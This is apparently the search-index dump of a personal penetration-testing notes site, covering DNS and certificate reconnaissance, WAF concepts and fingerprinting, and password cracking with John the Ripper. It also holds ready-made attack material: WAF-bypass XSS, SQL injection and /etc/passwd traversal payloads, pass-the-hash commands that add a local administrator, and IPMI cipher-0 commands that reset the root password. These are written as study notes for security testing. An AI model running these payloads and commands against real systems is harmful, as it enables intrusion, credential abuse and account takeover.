• dnscan: Python wordlist-based DNS subdomain scanner.
• gobuster: for brute force enumerations.
• nslookup: query DNS records for a domain.
• amass: in-depth DNS enumeration and network mapping.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum","title":"dnsenum","text":"

    dnsenum Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. Used for active fingerprinting:

    dnsenum domain.com\n

One cool thing about dnsenum is that it can perform DNS zone transfers, like dig. dnsenum performs DNS brute force with /usr/share/dnsenum/dns.txt.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dig","title":"dig","text":"

    Additionally, see dig axfr.

    dig (More complete cheat sheet: dig)

# Syntax for transferring a DNS zone\ndig axfr @nameserver example.com\n\n# Get the email of the domain administrator\ndig soa www.example.com\n# The email will use dot (.) notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# ns: other known name servers appear in the NS records\n# the @ character specifies the DNS server we want to query\n\n# View all available records\ndig any example.com @$ip\n\n# Display version: query a DNS server's version using a CHAOS-class TXT query. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce","title":"Fierce","text":"

    Fierce (More complete cheat sheet: fierce)

    # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnscan","title":"DNScan","text":"

    DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

dnscan.py (-d <domain> | -l <list>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_1","title":"gobuster","text":"

    gobuster (More complete cheat sheet: gobuster)

    gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nslookup","title":"nslookup","text":"

    nslookup (More complete cheat sheet: nslookup)

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#25-subdomain-enumeration","title":"2.5. Subdomain enumeration","text":"

Using a SecLists wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sublist3r","title":"Sublist3r","text":"

Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. It is easily blocked by Google.

    python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce_1","title":"fierce","text":"
    # Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_2","title":"gobuster","text":"

    Gobuster:

    gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz_1","title":"wfuzz","text":"

    Wfuzz:

wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent threads\n# -u https://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist\n# -H \"Host: FUZZ.nunchucks.htb\": Header; \"FUZZ\" marks the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines. In this case, 546\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum_1","title":"dnsenum","text":"

    Using dnsenum.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#bash-script-with-dig-and-seclist","title":"Bash script with dig and seclist","text":"

Bash script, using a SecLists wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-vhost-enumeration","title":"2.6. VHOST enumeration","text":"

    A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

    There are two ways to configure virtual hosts:

    • IP-based virtual hosting
    • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.

    vHost Fuzzing

    # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

    vHost Fuzzing with ffuf:

    # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-certificate-enumeration","title":"2.6. Certificate enumeration","text":"

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use (for instance, when gathering information to prepare a phishing attack).

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sslyze-and-sslabs","title":"sslyze and sslabs","text":"

For this we can use (see the sslyze sketch below):

• sslyze
• ssllabs by Qualys
• https://ciphersuite.info
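
A minimal sslyze sketch (example.com is a placeholder; exact flags vary between sslyze versions):

sslyze example.com\n# Scans the target's TLS configuration: supported cipher suites, certificate chain, common TLS vulnerabilities\n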

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_4","title":"nmap","text":"

    Also, you can use a script for nmap:

    nmap --script ssl-enum-ciphers <HOSTNAME>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#virustotal","title":"virustotal","text":"

    virustotal.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#crtsh-with-curl","title":"crt.sh with curl","text":"

    crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

# Get all subdomains with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the company-hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n\ncurl -s \"https://crt.sh/?q=${TARGET}&output=json\" | jq -r '.[] | \"\\(.name_value)\\n\\(.common_name)\"' | sort -u > \"${TARGET}_crt.sh.txt\"\n# curl -s: Issue the request with minimal output.\n# https://crt.sh/?q=<DOMAIN>&output=json: Ask for the json output.\n# jq -r '.[] | \"\\(.name_value)\\n\\(.common_name)\"': Process the json output and print the certificate's name value and common name, one per line.\n# sort -u: Sort the output alphabetically and remove duplicates.\n\n# We can also manually perform this operation against a target using OpenSSL:\nopenssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' -connect \"${TARGET}:${PORT}\" | openssl x509 -noout -text -in - | grep 'DNS' | sed -e 's|DNS:|\\n|g' -e 's|^\\*.*||g' | tr -d ',' | sort -u\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censysio","title":"censys.io","text":"

    https://censys.io: We can navigate to https://search.censys.io/certificates or https://crt.sh and introduce the domain name of our target organization to start discovering new subdomains.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#the-harvester","title":"The Harvester","text":"

    The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

    Automate the modules we want to launch:

    1. Create a list of sources, one per line, sources.txt.

    2. Execute:

     cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

    3. When the process finishes, extract all the subdomains found and sort them:

    cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

    4. Merge all the passive reconnaissance files:

cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\ncat facebook.com_subdomains_passive.txt | wc -l\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan_1","title":"Shodan","text":"

    Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

    for i in $(cat ip-addresses.txt);do shodan host $i;done\n

With this we'll get an IP list that we can use to search for DNS records.

    ","tags":["pentest","information gathering","web"]},{"location":"inmunity-debugger/","title":"Inmunity Debugger","text":"","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#installation","title":"Installation","text":"

    https://www.immunityinc.com/products/debugger/

    ","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#firefox-api-hooking-with-inmunity-debugger","title":"Firefox API hooking with Inmunity Debugger","text":"

Firefox uses a function called PR_Write inside a DLL module called nss3.dll to write/submit data. So once the target enters their username and password and clicks on the login button, the firefox process will call the PR_Write function from the nss3.dll module; if we set a breakpoint at that function, we should see the data in clear text.

Reference: https://developer.mozilla.org/en-docs/Mozilla/Projects/NSPR/Reference/PR_Write

    ","tags":["python","python pentesting","tools"]},{"location":"input-filtering/","title":"Input filtering","text":"

    Input Filtering involves validating and sanitizing data received by the web application from users or external sources. Input filtering helps prevent security vulnerabilities such as SQL injection, cross-site scripting (XSS), and command injection. Some common techniques for input filtering include data validation, input validation, and input sanitization:

• Data Validation: Data validation checks whether the incoming data conforms to expected formats and constraints. Example: an email field (see the shell sketch after this list).
    • Input Validation: Input validation goes a step further by not only checking data formats but also assessing data for potential security threats. It detects and rejects input that could be used for attacks, such as SQL injection payloads or malicious scripts.
    • Input Sanitization: Input sanitization involves cleaning or escaping input data to remove or neutralize potentially dangerous characters or content.
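
A minimal shell sketch of data validation for the email-field example (the regex is an illustrative assumption, not a complete RFC-compliant check):

# Accept input only if it matches a simple email pattern\necho \"user@example.com\" | grep -Eq \"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}$\" && echo \"valid\" || echo \"invalid\"\n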
    "},{"location":"input-filtering/#input-filtering-techniques","title":"Input filtering techniques","text":"
• Content Security Policy (CSP): CSP is a security feature that controls which sources of content are allowed to be loaded by a web page. It helps prevent XSS attacks by specifying which domains are permitted sources for scripts, styles, images, and other resources. (A header check sketch follows this list.)
    • Cross-Site Request Forgery (CSRF) Protection: Filtering mechanisms can be used to implement CSRF protection, ensuring that incoming requests have valid anti-CSRF tokens to prevent attackers from tricking users into performing actions they didn't intend.
    • Web Application Firewalls (WAFs): WAFs are security appliances or services that filter incoming HTTP requests to a web application. They use predefined rules and heuristics to detect and block malicious traffic.
    • Regular Expression Filtering: Regular expressions (regex) can be used to filter and validate data against complex patterns. However, improper regex usage can introduce security vulnerabilities, so careful crafting and testing of regex patterns are necessary.
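
A minimal sketch to check which of these defenses a site advertises in its response headers (example.com is a placeholder):

curl -s -I https://example.com | grep -iE \"content-security-policy|x-frame-options|x-content-type-options|strict-transport-security\"\n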
    "},{"location":"input-filtering/#evasion-techniques","title":"Evasion techniques","text":"

    Web application defense mechanisms are proactive tools and techniques designed to protect and defend web applications against various security threats and vulnerabilities.

    Evasion in web application security testing refers to the practice of using various techniques and methods to bypass or circumvent security mechanisms and controls put in place to protect a web application.

    "},{"location":"input-filtering/#bypass-what","title":"Bypass what!","text":"
    • Authentication: Authentication mechanisms verify the identity of users and ensure that they have the appropriate permissions to access specific resources within the application. Common authentication methods include username and password, multi-factor authentication (MFA), and biometrics.
    • Authorization: Authorization mechanisms determine what actions and resources users are allowed to access within the application once they have been authenticated. This includes defining roles, permissions, and access controls.
    • Input Validation/Filtering: Input validation is the process of verifying and sanitizing data received from users or external sources to prevent malicious input that could lead to vulnerabilities like SQL injection, cross-site scripting (XSS), or command injection.
    • Session Management: Session management mechanisms are responsible for creating, managing, and securing user sessions. They include measures like session timeouts, secure session tokens, and protection against session fixation attacks.
    • Cross-Site Request Forgery (CSRF) Protection: CSRF protection mechanisms prevent attackers from tricking users into making unauthorized requests to the application on their behalf. Tokens and anti-CSRF measures are often used for this purpose.
    • Security Headers: HTTP security headers like Content Security Policy (CSP), X-Content-Type-Options, and X-Frame-Options are used to control how web browsers should handle various aspects of web page security and rendering.
    • Rate Limiting: Rate limiting mechanisms restrict the number of requests a user or IP address can make to the application within a specific time frame. This helps prevent brute force attacks and DDoS attempts.
    • Web Application Firewalls (WAFs): WAFs are security appliances or software solutions that sit between the web application and the client to monitor and filter incoming traffic. They can detect and block common web application attacks, such as SQL injection, cross-site scripting (XSS), and application-layer DDoS attacks.
    • Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): IDS and IPS solutions inspect network and application traffic for signs of suspicious or malicious activity. IDS detects and alerts on potential threats, while IPS can take proactive measures to block or prevent malicious traffic.
    • Proxies: In the context of web applications, proxies refer to intermediary servers that facilitate communication between a user's browser and the web server hosting the application. These proxies can serve various purposes, ranging from enhancing security and privacy to optimizing performance and managing network traffic.
    "},{"location":"input-filtering/#bypass-how","title":"Bypass how!","text":"
• Bypassing Web Application Firewalls (WAFs)/Proxy Rules: WAFs and proxies are designed to filter out malicious requests and prevent attacks like SQL injection or cross-site scripting (XSS). Evasion techniques may involve encoding, obfuscation, or fragmentation of malicious payloads to bypass the WAF's detection rules (a URL-encoding sketch follows this list).
    • Evading Intrusion Detection Systems (IDS): IDS systems monitor network traffic for signs of malicious activity. Evasion techniques can be used to hide or modify the payload of an attack so that it goes undetected by the IDS.
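
A minimal sketch of the encoding idea: URL-encode a payload before sending it, so that naive pattern matching on the literal string fails (the payload is illustrative):

python3 -c 'import urllib.parse; print(urllib.parse.quote(\"<svg/onload=alert(1)>\"))'\n# %3Csvg/onload%3Dalert%281%29%3E\n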
    "},{"location":"input-filtering/#solutions-for-implementing-input-filtering","title":"Solutions for implementing input filtering","text":"

WAFs. A well-known open-source solution is ModSecurity. WAFs use rules to indicate what the filter must block or allow; these rules are usually written with Regular Expressions (RE or RegEx).

    See notes on regex.

The best solution for protecting a web app is whitelisting, but blacklisting methods are commonly found in deployments. A blacklist includes a collection of well-known attack patterns, which is why WAF bypasses exist.
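
A minimal sketch of why blacklists fail: a rule that matches only the literal 1=1 misses semantically equivalent payloads, like the ones listed in the next section (the rule and payloads are illustrative):

# A naive blacklist rule...\necho \"' or 1=1\" | grep -Eq \"or +1=1\" && echo \"blocked\"\n# ...is bypassed by an equivalent payload\necho \"' or 6=6\" | grep -Eq \"or +1=1\" || echo \"bypassed\"\n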

    "},{"location":"input-filtering/#waf-bypasses","title":"WAF bypasses","text":"
################\n# XSS: alert('xss') and alert(1)\n################\nprompt('xss')\nprompt(8)\nconfirm('xss')\nconfirm(8)\nalert(/xss/.source)\nwindow[/alert/.source](8)\n\n################\n# XSS: alert(document.cookie)\n################\nwith(document)alert(cookie)\nalert(document['cookie'])\nalert(document[/cookie/.source])\nalert(document[/coo/.source+/kie/.source])\n\n################\n# XSS: <img src=x onerror=alert(1);>\n################\n<svg/onload=alert(1)>\n<video src=x onerror=alert(1);>\n<audio src=x onerror=alert(1);>\n\n################\n# XSS: javascript:alert(document.cookie)\n################\ndata:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\n
################\n# Blind SQL injection: 'or 1=1\n################\n' or 6=6\n' or 0x47=0x47\nor char(32)=''\nor 6 is not null\n\n################\n# SQL injection: UNION SELECT\n################\n\nUNION ALL SELECT\n
    ################\n#  Directory Traversals: /etc/passwd\n################\n/too/../etc/far/../passwd\n/etc//passwd\n/etc/ignore/../passwd\n/etc/passwd.......\n
    ################\n#  Webshells: c99.php, r57.php, shell.aspx, cmd.jsp, CmdAsp.asp\n################\naugh.php\n
    "},{"location":"input-filtering/#fingerprinting-a-waf","title":"Fingerprinting a WAF","text":"

    Tools: wafw00f and nmap script:

nmap -p 80 --script http-waf-detect $ip\nnmap -p 80 --script http-waf-fingerprint $ip\n

    Detecting a WAF manually

    1. Cookies: Via cookie values.

• Citrix Netscaler: ns_af, citrix_ns_id, NSC_
• F5 BIG-IP ASM: TS followed by a string matching the regex ^TS[a-zA-Z0-9]{3,6}
• Barracuda: barra_counter_session, BNi__BARRACUDA_LB_COOKIE

2. Server cloaking: WAFs can rewrite the Server header to deceive attackers.

    3. Response codes: WAFs can also modify the HTTP response codes if the request is hostile.

4. Response bodies: WAFs can show up in response bodies, for instance mod_security, AQTRONIX WebKnight, or dotDefender.

5. Drop Action: WAFs can close the connection when they detect a malicious request.

    "},{"location":"input-filtering/#client-side-filters","title":"Client-side filters","text":""},{"location":"input-filtering/#firefox","title":"Firefox","text":"

Browser addons can act as client-side filters. NoScript, for example, is a whitelist-based security tool that disables all executable web content (JavaScript, Java, Flash, Silverlight...) and lets the user choose which sites are \"trusted\". A nice feature is its anti-XSS protection.

    "},{"location":"input-filtering/#internet-explorer","title":"Internet explorer","text":"

Internet Explorer ships with an XSS Filter, which modifies reflected values in the following way:

    # This payload\n<svg/onload=alert(1)>\n# is transformed to\n<svg/#nload=alert(1)>\n

XSS Filter is enabled by default in the Internet zone, but websites that want to opt out of this protection can use the following response header:

    X-XSS-Protection:0\n

Later on, the Internet Explorer team introduced a new directive in the X-XSS-Protection header:

    X-XSS-Protection:1; mode=block\n

    With this directive, if a potential XSS attack is detected, the browser, rather than attempting to sanitize the page, will render a simple #. This directive has been implemented in other browsers.

    "},{"location":"input-filtering/#chrome","title":"Chrome","text":"

Chrome has XSS Auditor, which sits between the HTML parser and the JS engine.

The filter analyzes both the inbound request and the outbound response. If executable code from the request is found within the response, it stops the script and generates a console alert.

    "},{"location":"interactsh/","title":"Interactsh - An alternative to BurpSuite Collaborator","text":"

Interactsh is an open-source tool for detecting out-of-band interactions, i.e. vulnerabilities that cause external interactions.

    Website version: https://app.interactsh.com/

    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#installation","title":"Installation","text":"

    Download from: https://github.com/projectdiscovery/interactsh/

    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n
    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#basic-usage","title":"Basic Usage","text":"
    interactsh-client   \n

    Cry for help:

    interactsh-client  -h\n

Interactsh server runs multiple services and captures all the incoming requests. To host an instance of interactsh-server, you are required to set up:

    1. Domain name with custom host names and nameservers.
    2. Basic droplet running 24/7 in the background.
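
Once both are in place, a minimal sketch of starting the server (the domain is a placeholder; check interactsh-server -h for the exact flags of your version):

interactsh-server -domain example.com\n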
    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#burpsuite-integrated","title":"Burpsuite integrated","text":"

interactsh-collaborator is a Burp Suite extension developed and maintained by @wdahlenb.

    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"invoke-the-hash/","title":"Invoke-TheHash","text":"

    Collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#installation","title":"Installation","text":"

    Download Powershell Invoke-TheHash fuctions from github repo:https://github.com/Kevin-Robertson/Invoke-TheHash.

    When using Invoke-TheHash, we have two options: SMB or WMI command execution.

    cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
    Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

    How to generate a reverse shell.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
    Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

    How to generate a reverse shell.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"ipmitool/","title":"IPMItool","text":"","tags":["pentesting","port 623","ipmi"]},{"location":"ipmitool/#ipmi-authentication-bypass-via-cipher-0","title":"IPMI Authentication Bypass via Cipher 0","text":"

    Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

    use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

    Abuse this flaw with ipmitool:

    # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H  $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
    ","tags":["pentesting","port 623","ipmi"]},{"location":"jaws/","title":"JAWS - Just Another Windows (Enum) Script","text":"","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#installation","title":"Installation","text":"

    Github repo: https://github.com/411Hall/JAWS.

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#basis-usage","title":"Basis usage","text":"

    Run from within CMD shell and write out to file.

    CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt\n

    Run from within CMD shell and write out to screen.

    CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1\n

    Run from within PS Shell and write out to file.

    PS C:\\temp> .\\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt\n
    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"john-the-ripper/","title":"John the Ripper - A hash cracker and dictionary attack tool","text":"

John the Ripper (JTR or john) is a versatile tool: you can use it to crack password hashes and to crack password-protected files.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#installation","title":"Installation","text":"

    Download from: https://www.openwall.com/john/.

john --list=formats gives you a list of the supported hash formats.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-hash","title":"Crack a hash","text":"","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-single-crack-mode-attack","title":"Hash: Single Crack Mode attack","text":"
    john --format=sha256 hashes_to_crack.txt\n# --format=sha256: specifies that the hash format is SHA-256\n# hashes_to_crack.txt:  is the file name containing the hashes to be cracked \n

John will output the cracked passwords to the console and to the file "john.pot" (~/.john/john.pot) in the current user's home directory.

    Furthermore, it will continue cracking the remaining hashes in the background, and we can check the progress by running:

john --show hashes_to_crack.txt\n

    Cheat sheet:

All formats below are used the same way: john --format=<format> hashes_to_crack.txt

afs: AFS (Andrew File System) password hashes
bfegg: bfegg hashes used in Eggdrop IRC bots
bf: Blowfish-based crypt(3) hashes
bsdi: BSDi crypt(3) hashes
crypt: Traditional Unix crypt(3) hashes
des: Traditional DES-based crypt(3) hashes
dmd5: DMD5 (Dragonfly BSD MD5) password hashes
dominosec: IBM Lotus Domino 6/7 password hashes
episerver: EPiServer SID (Security Identifier) password hashes
hdaa: hdaa password hashes used in Openwall GNU/Linux
hmac-md5: hmac-md5 password hashes
hmailserver: hmailserver password hashes
ipb2: Invision Power Board 2 password hashes
krb4: Kerberos 4 password hashes
krb5: Kerberos 5 password hashes
LM: LM (Lan Manager) password hashes
lotus5: Lotus Notes/Domino 5 password hashes
md4-gen: Generic MD4 password hashes
md5: MD5 password hashes
md5-gen: Generic MD5 password hashes
mscash: MS Cache password hashes
mscash2: MS Cache v2 password hashes
mschapv2: MS CHAP v2 password hashes
mskrb5: MS Kerberos 5 password hashes
mssql05: MS SQL 2005 password hashes
mssql: MS SQL password hashes
mysql-fast: MySQL fast password hashes
mysql: MySQL password hashes
mysql-sha1: MySQL SHA1 password hashes
netlm: NETLM (NT LAN Manager) password hashes
netlmv2: NETLMv2 (NT LAN Manager version 2) password hashes
netntlm: NETNTLM (NT LAN Manager) password hashes
netntlmv2: NETNTLMv2 (NT LAN Manager version 2) password hashes
nethalflm: NEThalfLM (NT LAN Manager) password hashes
md5ns: md5ns (MD5 namespace) password hashes
nsldap: nsldap (OpenLDAP SHA) password hashes
ssha: ssha (Salted SHA) password hashes
nt: NT (Windows NT) password hashes
openssha: OPENSSH private key password hashes
oracle11: Oracle 11 password hashes
oracle: Oracle password hashes
pdf: PDF (Portable Document Format) password hashes
phpass-md5: PHPass-MD5 (Portable PHP password hashing framework) password hashes
phps: PHPS password hashes
pix-md5: Cisco PIX MD5 password hashes
po: Po (Sybase SQL Anywhere) password hashes
rar: RAR (WinRAR) password hashes
raw-md4: Raw MD4 password hashes
raw-md5: Raw MD5 password hashes
raw-md5-unicode: Raw MD5 Unicode password hashes
raw-sha1: Raw SHA1 password hashes
raw-sha224: Raw SHA224 password hashes
raw-sha256: Raw SHA256 password hashes
raw-sha384: Raw SHA384 password hashes
raw-sha512: Raw SHA512 password hashes
salted-sha: Salted SHA password hashes
sapb: SAP CODVN B (BCODE) password hashes
sapg: SAP CODVN G (PASSCODE) password hashes
sha1-gen: Generic SHA1 password hashes
skey: S/Key (One-time password) hashes
ssh: SSH (Secure Shell) password hashes
sybasease: Sybase ASE password hashes
xsha: xsha (Extended SHA) password hashes
zip: ZIP (WinZip) password hashes
","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-wordlist-mode-attack","title":"Hash: Wordlist mode attack","text":"
    john --wordlist=<wordlist_file> --rules <hash_file>\n

    Multiple wordlists can be specified by separating them with a comma.

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-incremental-mode-attack","title":"Hash: Incremental mode attack","text":"

Incremental Mode is an advanced John mode used to crack passwords using a character set. It is essentially a brute-force attack: it attempts to match the password by trying all possible combinations of characters from the character set. This mode is the most effective yet most time-consuming of all the John modes.

    john --incremental <hash_file>\n

    Additionally, it is important to note that the default character set is limited to a-zA-Z0-9. Therefore, if we attempt to crack complex passwords with special characters, we need to use a custom character set.
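
For example, John ships with several predefined incremental modes in john.conf (Digits, Alnum, ASCII, etc.), and you can define your own [Incremental:...] section for special characters; the "Custom" mode name below is an illustrative assumption:

# Use a predefined charset mode\njohn --incremental=Digits hashes_to_crack.txt\n\n# Use a custom mode (assumes an [Incremental:Custom] section was added to john.conf)\njohn --incremental=Custom hashes_to_crack.txt\n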

    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-file","title":"Crack a file","text":"

    For cracking files you have the following tools:

pdf2john: Converts PDF documents for John
ssh2john: Converts SSH private keys for John
mscash2john: Converts MS Cash hashes for John
keychain2john: Converts OS X keychain files for John
rar2john: Converts RAR archives for John
pfx2john: Converts PKCS#12 files for John
truecrypt_volume2john: Converts TrueCrypt volumes for John
keepass2john: Converts KeePass databases for John
vncpcap2john: Converts VNC PCAP files for John
putty2john: Converts PuTTY private keys for John
zip2john: Converts ZIP archives for John
hccap2john: Converts WPA/WPA2 handshake captures for John
office2john: Converts MS Office documents for John
wpa2john: Converts WPA/WPA2 handshakes for John

If you need additional ones, run:

    locate *2john*\n
